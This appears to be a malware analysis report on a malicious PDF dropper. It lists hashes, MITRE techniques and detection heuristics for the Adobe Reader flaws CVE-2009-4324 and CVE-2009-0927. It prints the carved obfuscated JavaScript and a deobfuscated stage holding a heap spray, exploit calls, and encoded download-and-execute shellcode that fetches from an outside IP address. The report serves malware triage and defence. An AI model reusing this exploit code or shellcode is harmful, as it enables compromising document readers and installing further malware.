Malicious PDF — malware analysis report

Static analysis result for SHA-256 f27a017e23c01123…

MALICIOUS

PDF

13.4 KB First seen: 2026-05-08
MD5: 9710b92b8415d13fb224fd47b5bbcbfc SHA-1: ea9c1b7a9d319ee403de9c7c1260155333a8a430 SHA-256: f27a017e23c01123745c34824a587732119f1c73ad65a1964696420506e102f7
310 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains embedded JavaScript that exploits multiple Adobe Reader vulnerabilities, specifically CVE-2009-4324 and CVE-2009-0927, to achieve code execution. The deobfuscated JavaScript contains URLs that are used to download a second-stage payload. This indicates a multi-stage attack where the initial PDF serves as a dropper.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 9

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://91.228.133.56/dng290911/db1523498df7965a4ccd8abc43397f6d/d7.php?f=g Referenced by PDF JavaScript
    • http://91.228.133.56/dng290911/db1523498df7965a4ccd8abc43397f6d/d8.php?f=nReferenced by PDF JavaScript

Related samples 8

Ranked by shared artifacts, heuristics, extracted URLs, CVEs, and signatures.

Full JSON: related samples API

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0076_000.js pdf-javascript-stream PDF /JS object 76 at offset 0x38A 12669 bytes
SHA-256: 63e2f1be4fa75a8247f4f2eae187d6d08626ce62d6e7b8d9afcf9857c82c7caf
Preview script
First 1,000 lines of the extracted script
a="0)r(Si,oa3]+|tbNxCc_n6d;{v>@=h}Iu7%[VD-p4&yP9'B<2sA.8e fg51lmFE:w";
w='';
w+='sl';
w+='i';
w+="c"+a[53];
j='b343tb3g';
j=j[w];
z
=new Array
(25,8,2,54,19,58,7,28,45,34,32,52,9,21,21,34,32,61,17,62,40,34,32,52,57,61,17,34,32,33,57,62,40,34,32,62,44,9,40,34,32,9,9,57,61,34,32,21,40,17,0,34,32,40,0,52,46,34,32,52,46,9,0,34,32,0,17,40,0,34,32,33,0,52,46,34,32,57,21,58,17,34,32,33,21,52,46,34,32,9,9,0,52,34,32,21,21,37,46,34,32,57,62,52,46,34,32,0,9,9,17,34,32,9,9,33,40,34,32,52,58,48,17,34,32,58,57,62,62,34,32,61,61,58,0,34,32,46,52,61,61,34,32,40,0,52,46,34,32,17,9,9,0,34,32,9,44,40,21,34,32,33,57,0,21,34,32,52,33,61,46,34,32,48,40,9,40,34,32,62,40,52,57,34,32,57,58,33,57,34,32,62,46,62,44,34,32,57,58,40,17,34,32,52,46,57,21,34,32,9,17,33,57,34,32,33,40,52,46,34,32,33,52,9,57,34,32,61,57,0,9,34,32,52,46,57,21,34,32,48,0,33,21,34,32,61,57,0,9,34,32,17,44,9,9,34,32,40,58,40,44,34,32,50,37,61,17,34,32,17,57,0,9,34,32,37,46,9,9,34,32,46,62,0,61,34,32,9,52,58,0,34,32,33,40,61,48,34,32,17,58,0,52,34,32,0,37,17,46,34,32,37,50,0,9,34,32,62,46,40,0,34,32,9,46,61,58,34,32,33,57,58,61,34,32,57,62,62,21,34,32,57,62,52,46,34,32,0,9,48,40,34,32,21,21,37,37,34,32,0,17,52,46,34,32,52,37,40,46,34,32,62,17,40,21,34,32,57,40,61,61,34,32,0,17,48,40,34,32,37,52,52,46,34,32,37,37,0,9,34,32,0,40,52,46,34,32,0,9,52,46,34,32,50,46,17,57,34,32,57,44,57,62,34,32,62,46,17,9,34,32,50,37,57,9,34,32,21,52,52,46,34,32,52,0,48,0,34,32,0,17,33,37,34,32,33,40,9,9,34,32,44,21,0,9,34,32,61,9,62,46,34,32,21,52,52,46,34,32,52,46,0,52,34,32,21,50,61,33,34,32,57,44,0,57,34,32,44,52,62,52,34,32,61,61,61,61,34,32,62,48,61,61,34,32,62,52,61,44,34,32,0,0,0,0,34,32,0,0,0,0,34,32,57,0,57,52,34,32,40,0,21,50,34,32,61,61,21,52,34,32,0,0,0,0,34,32,57,0,0,0,34,32,17,0,52,9,34,32,57,0,58,44,34,32,52,46,57,57,34,32,52,46,62,17,34,32,58,0,57,62,34,32,17,9,52,9,34,32,61,61,0,57,34,32,21,52,62,9,34,32,21,62,21,61,34,32,0,0,0,0,34,32,33,57,21,52,34,32,21,17,33,48,34,32,57,40,21,37,34,32,58,21,61,61,34,32,17,40,52,9,34,32,52,46,0,52,34,32,62,52,62,52,34,32,61,61,21,58,34,32,61,61,61,61,34,32,0,48,62,46,34,32,33,48,62,46,34,32,62,17,52,58,34,32,0,58,0,40,34,32,0,0,0,0,34,32,57,17,52,37,34,32,0,17,48,40,34,32,0,40,17,33,34,32,33,48,48,40,34,32,21,33,21,57,34,32,17,33,33,9,34,32,48,40,40,40,34,32,33,21,0,40,34,32,9,9,33,48,34,32,17,33,9,48,34,32,48,40,40,40,34,32,48,0,0,52,34,32,33,9,48,37,34,32,57,9,48,0,34,32,61,52,21,52,34,32,0,0,0,0,34,32,61,61,0,0,34,32,0,17,57,21,34,32,62,52,52,46,34,32,17,44,9,9,34,32,17,33,57,58,34,32,58,37,40,40,34,32,33,33,0,0,34,32,21,48,33,0,34,32,17,33,33,40,34,32,58,37,40,40,34,32,48,62,0,57,34,32,21,17,21,40,34,32,17,21,21,17,34,32,58,37,40,40,34,32,0,0,0,44,34,32,52,50,57,44,34,32,0,40,17,58,34,32,52,52,9,0,34,32,58,37,40,40,34,32,40,58,0,40,34,32,21,50,57,58,34,32,21,50,0,0,34,32,57,9,0,0,34,32,21,50,57,33,34,32,61,61,0,0,34,32,58,40,57,21,34,32,17,0,52,57,34,32,58,21,33,57,34,32,0,0,21,50,34,32,61,61,57,9,34,32,0,40,57,21,34,32,0,0,21,50,34,32,62,46,52,9,34,32,57,9,0,17,34,32,57,21,61,61,34,32,52,9,0,40,34,32,0,17,17,9,34,32,0,48,62,46,34,32,58,9,62,46,34,32,52,0,40,33,34,32,0,0,9,61,34,32,61,50,33,57,34,32,52,0,40,33,34,32,0,0,9,61,34,32,17,40,33,57,34,32,0,0,21,50,34,32,61,62,21,50,34,32,57,21,61,61,34,32,62,52,0,52,34,32,61,62,44,17,34,32,61,61,61,61,34,32,40,62,52,62,34,32,62,17,0,62,34,32,61,62,44,52,34,32,0,62,52,50,34,32,21,61,52,44,34,32,46,37,0,58,34,32,17,50,9,9,34,32,57,46,52,50,34,32,17,21,58,46,34,32,33,44,40,21,34,32,58,50,9,21,34,32,33,0,48,61,34,32,33,40,21,52,34,32,33,0,33,40,34,32,48,61,9,50,34,32,9,44,48,61,34,32,48,62,9,58,34,32,9,48,9,48,34,32,48,62,9,52,34,32,9,9,9,58,34,32,48,62,9,9,34,32,9,21,9,57,34,32,21,40,48,61,34,32,21,33,21,62,34,32,9,44,9,48,34,32,9,44,9,0,34,32,9,58,9,58,34,32,21,40,48,61,34,32,9,58,21,48,34,32,9,48,9,57,34,32,9,40,9,9,34,32,9,52,9,44,34,32,21,21,21,40,34,32,9,44,9,33,34,32,9,57,9,21,34,32,9,40,21,58,34,32,21,9,21,9,34,32,9,52,21,40,34,32,21,48,21,58,34,32,9,40,21,9,34,32,9,9,9,9,34,32,9,33,9,44,34,32,9,21,21,21,34,32,48,61,21,40,34,32,9,33,21,40,34,32,33,0,48,62,34,32,33,0,21,52,34,32,21,21,9,61,34,32,21,33,9,37,34,32,0,0,0,0,45,23,25,8,2,54,19,48,7,28,45,34,32,52,9,21,21,34,32,61,17,62,40,34,32,52,57,61,17,34,32,33,57,62,40,34,32,62,44,9,40,34,32,9,9,57,61,34,32,21,40,17,0,34,32,40,0,52,46,34,32,52,46,9,0,34,32,0,17,40,0,34,32,33,0,52,46,34,32,57,21,58,17,34,32,33,21,52,46,34,32,9,9,0,52,34,32,21,21,37,46,34,32,57,62,52,46,34,32,0,9,9,17,34,32,9,9,33,40,34,32,52,58,48,17,34,32,58,57,62,62,34,32,61,61,58,0,34,32,46,52,61,61,34,32,40,0,52,46,34,32,17,9,9,0,34,32,9,44,40,21,34,32,33,57,0,21,34,32,52,33,61,46,34,32,48,40,9,40,34,32,62,40,52,57,34,32,57,58,33,57,34,32,62,46,62,44,34,32,57,58,40,17,34,32,52,46,57,21,34,32,9,17,33,57,34,32,33,40,52,46,34,32,33,52,9,57,34,32,61,57,0,9,34,32,52,46,57,21,34,32,48,0,33,21,34,32,61,57,0,9,34,32,17,44,9,9,34,32,40,58,40,44,34,32,50,37,61,17,34,32,17,57,0,9,34,32,37,46,9,9,34,32,46,62,0,61,34,32,9,52,58,0,34,32,33,40,61,48,34,32,17,58,0,52,34,32,0,37,17,46,34,32,37,50,0,9,34,32,62,46,40,0,34,32,9,46,61,58,34,32,33,57,58,61,34,32,57,62,62,21,34,32,57,62,52,46,34,32,0,9,48,40,34,32,21,21,37,37,34,32,0,17,52,46,34,32,52,37,40,46,34,32,62,17,40,21,34,32,57,40,61,61,34,32,0,17,48,40,34,32,37,52,52,46,34,32,37,37,0,9,34,32,0,40,52,46,34,32,0,9,52,46,34,32,50,46,17,57,34,32,57,44,57,62,34,32,62,46,17,9,34,32,50,37,57,9,34,32,21,52,52,46,34,32,52,0,48,0,34,32,0,17,33,37,34,32,33,40,9,9,34,32,44,21,0,9,34,32,61,9,62,46,34,32,21,52,52,46,34,32,52,46,0,52,34,32,21,50,61,33,34,32,57,44,0,57,34,32,44,52,62,52,34,32,61,61,61,61,34,32,62,48,61,61,34,32,62,52,61,44,34,32,0,0,0,0,34,32,0,0,0,0,34,32,57,0,57,52,34,32,40,0,21,50,34,32,61,61,21,52,34,32,0,0,0,0,34,32,57,0,0,0,34,32,17,0,52,9,34,32,57,0,58,44,34,32,52,46,57,57,34,32,52,46,62,17,34,32,58,0,57,62,34,32,17,9,52,9,34,32,61,61,0,57,34,32,21,52,62,9,34,32,21,62,21,61,34,32,0,0,0,0,34,32,33,57,21,52,34,32,21,17,33,48,34,32,57,40,21,37,34,32,58,21,61,61,34,32,17,40,52,9,34,32,52,46,0,52,34,32,62,52,62,52,34,32,61,61,21,58,34,32,61,61,61,61,34,32,0,48,62,46,34,32,33,48,62,46,34,32,62,17,52,58,34,32,0,58,0,40,34,32,0,0,0,0,34,32,57,17,52,37,34,32,0,17,48,40,34,32,0,40,17,33,34,32,33,48,48,40,34,32,21,33,21,57,34,32,17,33,33,9,34,32,48,40,40,40,34,32,33,21,0,40,34,32,9,9,33,48,34,32,17,33,9,48,34,32,48,40,40,40,34,32,48,0,0,52,34,32,33,9,48,37,34,32,57,9,48,0,34,32,61,52,21,52,34,32,0,0,0,0,34,32,61,61,0,0,34,32,0,17,57,21,34,32,62,52,52,46,34,32,17,44,9,9,34,32,17,33,57,58,34,32,58,37,40,40,34,32,33,33,0,0,34,32,21,48,33,0,34,32,17,33,33,40,34,32,58,37,40,40,34,32,48,62,0,57,34,32,21,17,21,40,34,32,17,21,21,17,34,32,58,37,40,40,34,32,0,0,0,44,34,32,52,50,57,44,34,32,0,40,17,58,34,32,52,52,9,0,34,32,58,37,40,40,34,32,40,58,0,40,34,32,21,50,57,58,34,32,21,50,0,0,34,32,57,9,0,0,34,32,21,50,57,33,34,32,61,61,0,0,34,32,58,40,57,21,34,32,17,0,52,57,34,32,58,21,33,57,34,32,0,0,21,50,34,32,61,61,57,9,34,32,0,40,57,21,34,32,0,0,21,50,34,32,62,46,52,9,34,32,57,9,0,17,34,32,57,21,61,61,34,32,52,9,0,40,34,32,0,17,17,9,34,32,0,48,62,46,34,32,58,9,62,46,34,32,52,0,40,33,34,32,0,0,9,61,34,32,61,50,33,57,34,32,52,0,40,33,34,32,0,0,9,61,34,32,17,40,33,57,34,32,0,0,21,50,34,32,61,62,21,50,34,32,57,21,61,61,34,32,62,52,0,52,34,32,61,62,44,17,34,32,61,61,61,61,34,32,40,62,52,62,34,32,62,17,0,62,34,32,61,62,44,52,34,32,0,62,52,50,34,32,21,61,52,44,34,32,46,37,0,58,34,32,17,50,9,9,34,32,57,46,52,50,34,32,17,21,58,46,34,32,33,44,40,21,34,32,58,50,9,21,34,32,33,0,48,61,34,32,33,40,21,52,34,32,33,0,33,40,34,32,48,61,9,50,34,32,9,44,48,61,34,32,48,62,9,58,34,32,9,48,9,48,34,32,48,62,9,52,34,32,9,9,9,58,34,32,48,62,9,9,34,32,9,21,9,57,34,32,21,40,48,61,34,32,21,33,21,62,34,32,9,44,9,48,34,32,9,44,9,0,34,32,9,58,9,58,34,32,21,40,48,61,34,32,9,58,21,48,34,32,9,48,9,57,34,32,9,40,9,9,34,32,9,52,9,44,34,32,21,21,21,40,34,32,9,44,9,33,34,32,9,57,9,21,34,32,9,40,21,58,34,32,21,9,21,9,34,32,9,52,21,40,34,32,21,48,21,58,34,32,9,40,21,9,34,32,9,9,9,9,34,32,9,33,9,44,34,32,9,21,21,21,34,32,48,61,21,40,34,32,9,52,21,40,34,32,33,0,48,62,34,32,33,0,21,52,34,32,21,21,9,61,34,32,21,62,9,37,34,32,0,0,0,0,45,23,55,32,20,18,13,5,7,20,54,19,9,7,3,1,24,25,8,2,54,19,40,7,28,8,39,39,51,25,5,53,64,53,2,36,53,2,49,5,7,20,51,13,7,4,13,2,5,20,56,3,1,23,19,40,7,28,19,40,7,51,2,53,39,59,8,18,53,3,45,51,45,6,45,45,1,23,64,29,5,59,53,3,19,40,7,51,59,53,20,56,13,29,47,40,1,24,19,40,7,11,28,45,0,45,23,30,19,40,7,28,39,8,2,49,53,31,20,13,3,19,40,7,6,58,0,1,23,2,53,13,32,2,20,54,19,40,7,23,30,55,32,20,18,13,5,7,20,54,19,57,7,3,1,24,55,32,20,18,13,5,7,20,54,19,21,7,3,1,24,25,8,2,54,19,33,7,28,45,39,27,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,54,63,54,42,42,42,42,58,58,58,45,23,32,13,5,59,51,39,2,5,20,13,22,3,19,33,7,6,20,53,64,54,37,8,13,53,3,1,1,23,30,25,8,2,54,19,52,7,28,58,48,0,0,0,23,19,44,7,28,20,53,64,54,50,2,2,8,42,3,1,23,25,8,2,54,19,58,7,0,28,45,34,32,44,0,44,0,34,32,44,0,44,0,45,23,25,8,2,54,19,58,7,58,28,19,48,7,23,19,58,7,0,28,32,20,53,49,18,8,39,53,3,19,58,7,0,1,23,19,58,7,58,28,32,20,53,49,18,8,39,53,3,19,58,7,58,1,23,64,29,5,59,53,3,19,58,7,0,51,59,53,20,56,13,29,47,28,0,16,52,0,0,0,1,24,19,58,7,0,11,28,19,58,7,0,23,30,19,58,7,0,28,19,58,7,0,51,49,32,14,49,13,2,3,0,6,0,16,52,0,0,0,38,19,58,7,58,51,59,53,20,56,13,29,1,23,54,55,7,2,3,19,58,7,48,28,0,23,19,58,7,48,47,19,52,7,23,19,58,7,48,11,11,1,24,19,44,7,35,19,58,7,48,10,28,19,58,7,0,11,19,58,7,58,23,30,5,55,3,19,52,7,1,24,19,21,7,3,1,23,19,21,7,3,1,23,13,2,42,24,13,29,5,49,51,60,53,22,5,8,51,20,53,64,43,59,8,42,53,2,3,20,32,59,59,1,23,30,18,8,13,18,29,3,53,1,24,30,19,21,7,3,1,23,30,30,55,32,20,18,13,5,7,20,54,19,58,7,9,3,1,24,25,8,2,54,19,58,7,40,28,32,20,53,49,18,8,39,53,3,19,58,7,1,23,19,58,7,57,28,32,20,53,49,18,8,39,53,3,45,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,34,32,44,0,44,0,45,1,11,19,58,7,40,23,19,58,7,21,28,32,20,53,49,18,8,39,53,3,45,34,32,44,0,44,0,34,32,44,0,44,0,45,1,23,19,58,7,33,28,58,0,23,19,58,7,52,28,19,58,7,33,11,19,58,7,57,51,59,53,20,56,13,29,23,64,29,5,59,53,3,19,58,7,21,51,59,53,20,56,13,29,47,19,58,7,52,1,19,58,7,21,11,28,19,58,7,21,23,19,58,7,44,28,19,58,7,21,51,49,32,14,49,13,2,5,20,56,3,0,6,19,58,7,52,1,23,19,48,7,48,28,19,58,7,21,51,49,32,14,49,13,2,5,20,56,3,0,6,19,58,7,21,51,59,53,20,56,13,29,38,19,58,7,52,1,23,64,29,5,59,53,3,19,48,7,48,51,59,53,20,56,13,29,11,19,58,7,52,47,0,16,40,0,0,0,0,1,19,48,7,48,28,19,48,7,48,11,19,48,7,48,11,19,58,7,44,23,19,48,7,0,28,20,53,64,54,50,2,2,8,42,3,1,23,55,7,2,3,19,48,7,58,28,0,23,19,48,7,58,47,58,52,0,23,19,48,7,58,11,11,1,19,48,7,0,35,19,48,7,58,10,28,19,48,7,48,11,19,58,7,57,23,25,8,2,54,19,48,7,9,28,40,0,58,48,23,25,8,2,54,19,48,7,40,28,50,2,2,8,42,3,19,48,7,9,1,23,55,7,2,3,19,48,7,58,28,0,23,19,48,7,58,47,19,48,7,9,23,19,48,7,58,11,11,1,24,19,48,7,40,35,19,48,7,58,10,28,32,20,53,49,18,8,39,53,3,45,34,0,8,34,0,8,34,0,8,34,0,8,45,1,23,30,17,7,59,59,8,14,51,56,53,13,31,18,7,20,3,19,48,7,40,11,45,19,15,51,14,32,20,22,59,53,45,1,23,30,25,8,2,54,19,40,7,28,19,9,7,3,1,23,5,55,3,3,3,19,40,7,26,52,44,57,0,1,41,41,3,19,40,7,47,44,0,57,0,1,1,12,12,3,3,19,40,7,26,28,52,0,0,0,1,41,41,3,19,40,7,47,28,52,58,0,48,1,1,1,24,19,58,7,9,3,1,23,30,53,59,49,53,54,5,55,3,3,19,40,7,26,28,44,58,0,0,1,12,12,3,19,40,7,47,28,44,48,0,0,1,12,12,3,19,40,7,26,28,52,58,0,9,1,12,12,3,19,40,7,47,28,52,58,0,33,1,1,24,19,57,7,3,1,23,30);
s='';
b
=
'al';
b2
=a[53]
+
a[25]+b;for
(i=0;i<z.length;i++)
{s+=a[z[i]]}
e=(j());
e=e[b2];
e(s);
generic_stage_recovery_000.js deobfuscated-js generic stage recovery alphabet-index-array from JavaScript object 76 at offset 0x38A 4469 bytes
SHA-256: 3635ce3d4a495b9dcc1ba7c03f6ba31653c2be2d262c647cbfb0d59269b27002
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 6 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var _1o='%u8366%uFCE4%u85FC%u75E4%uE934%u335F%u64C0%u408B%u8B30%u0C40%u708B%u561C%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5175%uEBE9%u514C%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%uADFC%uC503%uDB33%uBE0F%u3810%u74F2%uC108%u0DCB%uDA03%uEB40%u3BF1%u751F%u5EE6%u5E8B%u0324%u66DD%u0C8B%u8D4B%uEC46%u54FF%u0C24%uD88B%uDD03%u048B%u038B%uABC5%u595E%uEBC3%uAD53%u688B%u8020%u0C7D%u7433%u9603%uF3EB%u688B%u8B08%u6AF7%u5905%u98E8%uFFFF%uE2FF%uE8F9%u0000%u0000%u5058%u406A%uFF68%u0000%u5000%uC083%u5019%u8B55%u8BEC%u105E%uC383%uFF05%u68E3%u6E6F%u0000%u7568%u6C72%u546D%u16FF%uC483%u8B08%uE8E8%uFF61%uFFFF%u02EB%u72EB%uEC81%u0104%u0000%u5C8D%u0C24%u04C7%u7224%u6765%uC773%u2444%u7604%u3372%uC732%u2444%u2008%u732D%u5320%uF868%u0000%uFF00%u0C56%uE88B%uC933%uC751%u1D44%u7700%u6270%uC774%u1D44%u2E05%u6C64%uC66C%u1D44%u0009%u8A59%u04C1%u8830%u1D44%u4104%u6A51%u6A00%u5300%u6A57%uFF00%u1456%uC085%u1675%u006A%uFF53%u0456%u006A%uEB83%u530C%u56FF%u8304%u0CC3%u02EB%u13EB%u8047%u003F%uFA75%u8047%u003F%uC475%u006A%uFE6A%u56FF%uE808%uFE9C%uFFFF%u4E8E%uEC0E%uFE98%u0E8A%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u392F%u2E31%u3232%u2E38%u3331%u2E33%u3635%u642F%u676E%u3932%u3930%u3131%u642F%u3162%u3235%u3433%u3839%u6664%u3937%u3536%u3461%u6363%u3864%u6261%u3463%u3333%u3739%u3666%u2F64%u3764%u702E%u7068%u663F%u673D%u0000';var _2o='%u8366%uFCE4%u85FC%u75E4%uE934%u335F%u64C0%u408B%u8B30%u0C40%u708B%u561C%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5175%uEBE9%u514C%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%uADFC%uC503%uDB33%uBE0F%u3810%u74F2%uC108%u0DCB%uDA03%uEB40%u3BF1%u751F%u5EE6%u5E8B%u0324%u66DD%u0C8B%u8D4B%uEC46%u54FF%u0C24%uD88B%uDD03%u048B%u038B%uABC5%u595E%uEBC3%uAD53%u688B%u8020%u0C7D%u7433%u9603%uF3EB%u688B%u8B08%u6AF7%u5905%u98E8%uFFFF%uE2FF%uE8F9%u0000%u0000%u5058%u406A%uFF68%u0000%u5000%uC083%u5019%u8B55%u8BEC%u105E%uC383%uFF05%u68E3%u6E6F%u0000%u7568%u6C72%u546D%u16FF%uC483%u8B08%uE8E8%uFF61%uFFFF%u02EB%u72EB%uEC81%u0104%u0000%u5C8D%u0C24%u04C7%u7224%u6765%uC773%u2444%u7604%u3372%uC732%u2444%u2008%u732D%u5320%uF868%u0000%uFF00%u0C56%uE88B%uC933%uC751%u1D44%u7700%u6270%uC774%u1D44%u2E05%u6C64%uC66C%u1D44%u0009%u8A59%u04C1%u8830%u1D44%u4104%u6A51%u6A00%u5300%u6A57%uFF00%u1456%uC085%u1675%u006A%uFF53%u0456%u006A%uEB83%u530C%u56FF%u8304%u0CC3%u02EB%u13EB%u8047%u003F%uFA75%u8047%u003F%uC475%u006A%uFE6A%u56FF%uE808%uFE9C%uFFFF%u4E8E%uEC0E%uFE98%u0E8A%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u392F%u2E31%u3232%u2E38%u3331%u2E33%u3635%u642F%u676E%u3932%u3930%u3131%u642F%u3162%u3235%u3433%u3839%u6664%u3937%u3536%u3461%u6363%u3864%u6261%u3463%u3333%u3739%u3666%u2F64%u3864%u702E%u7068%u663F%u6E3D%u0000';function _3o(){var _4o=app.viewerVersion.toString();_4o=_4o.replace('.','');while(_4o.length<4){_4o+='0';}_4o=parseInt(_4o,10);return _4o;}function _5o(){function _6o(){var _7o='p@111111111111111111111111 : yyyy111';util.printd(_7o,new Date());}var _8o=12000;_9o=new Array();var _1o0='%u9090%u9090';var _1o1=_2o;_1o0=unescape(_1o0);_1o1=unescape(_1o1);while(_1o0.length<=0x8000){_1o0+=_1o0;}_1o0=_1o0.substr(0,0x8000-_1o1.length); for(_1o2=0;_1o2<_8o;_1o2++){_9o[_1o2]=_1o0+_1o1;}if(_8o){_6o();_6o();try{this.media.newPlayer(null);}catch(e){}_6o();}}function _1o3(){var _1o4=unescape(_1o);_1o5=unescape('%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090')+_1o4;_1o6=unescape('%u9090%u9090');_1o7=10;_1o8=_1o7+_1o5.length;while(_1o6.length<_1o8)_1o6+=_1o6;_1o9=_1o6.substring(0,_1o8);_2o2=_1o6.substring(0,_1o6.length-_1o8);while(_2o2.length+_1o8<0x40000)_2o2=_2o2+_2o2+_1o9;_2o0=new Array();for(_2o1=0;_2o1<180;_2o1++)_2o0[_2o1]=_2o2+_1o5;var _2o3=4012;var _2o4=Array(_2o3);for(_2o1=0;_2o1<_2o3;_2o1++){_2o4[_2o1]=unescape('%0a%0a%0a%0a');}Collab.getIcon(_2o4+'_N.bundle');}var _4o=_3o();if(((_4o>8950)&&(_4o<9050))||((_4o>=8000)&&(_4o<=8102))){_1o3();}else if((_4o>=9100)||(_4o<=9200)||(_4o>=8103)||(_4o<=8107)){_5o();}
generic_stage_recovery_001.js deobfuscated-js generic stage recovery percent-decode from JavaScript object 76 at offset 0x38A 4461 bytes
SHA-256: eaf167ee186b02b8eb5dfd37cf0efb79c48d4a98e0b69649137bbdd4f0132b18
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 6 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
